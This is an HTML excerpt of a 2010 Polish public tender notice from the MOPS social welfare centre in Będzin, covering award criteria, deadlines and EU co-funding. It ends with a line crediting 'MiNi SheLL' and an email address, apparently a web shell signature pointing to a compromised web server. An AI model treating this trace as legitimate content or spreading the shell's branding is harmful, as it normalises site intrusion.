<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bedzin.bip.info.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS 
11 Listopada 1
42-500 Będzin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2010 godzina 13:00, miejsce: MOPS 
11 Listopada 1
42-500 Będzin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII. Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com